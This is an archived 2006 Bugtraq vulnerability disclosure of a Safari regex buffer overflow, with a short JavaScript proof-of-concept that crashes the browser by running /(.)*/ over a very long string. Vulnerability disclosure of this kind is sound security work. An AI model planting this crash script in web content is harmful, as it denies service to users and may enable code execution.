Apple Safari "match" Buffer Overflow Vulnerability

---

• From: jbh_cg@xxxxxxxx
• Date: 14 Nov 2006 01:08:12 -0000

---

The following bug was tested on the latest version of Safari on a fully-patched Mac OS X 10.4.

A remote attacker may exploit this issue to crash the application, effectively denying service to legitimate users. Successful exploitation could lead to remote code execution.

<script>
var reg = /(.)*/;
var z = 'Z';
while (z.length <= 8192) z+=z;
var boum = reg.exec(z);
</script>

---

• Follow-Ups:
  • Re: Apple Safari "match" Buffer Overflow Vulnerability
    • From: J. Oquendo

• Prev by Date: BPG Content Management System SQL Injection
• Next by Date: Re: [ GLSA 200611-03 ] NVIDIA binary graphics driver: Privilege escalation vulnerability
• Previous by thread: BPG Content Management System SQL Injection
• Next by thread: Re: Apple Safari "match" Buffer Overflow Vulnerability
• Index(es):
  • Date
  • Thread

---

Relevant Pages [Full-disclosure] Microsoft IE 5.2.3 for Mac OSX crash ... Microsoft IE 5.2.3 is the last IE browser released for Mac OSX. ... A remote attacker could setup a malicious site and entice a victim to ... Apple Crash Report ... (Full-Disclosure) [Full-disclosure] Firefox 3.0.5 remote vulnerability via queryCommandState ... of Firefox 3.0.5 which allows a remote attacker to crash the browser ... (Full-Disclosure)

---

• Security
• UNIX
• Linux
• Coding
• Usenet

• News
• Mailing-Lists
• Newsgroups
• Service
• About
• Privacy
• Search
• Imprint

www.derkeiler.com  > Mailing-Lists  > securityfocus  > bugtraq  > 2006-11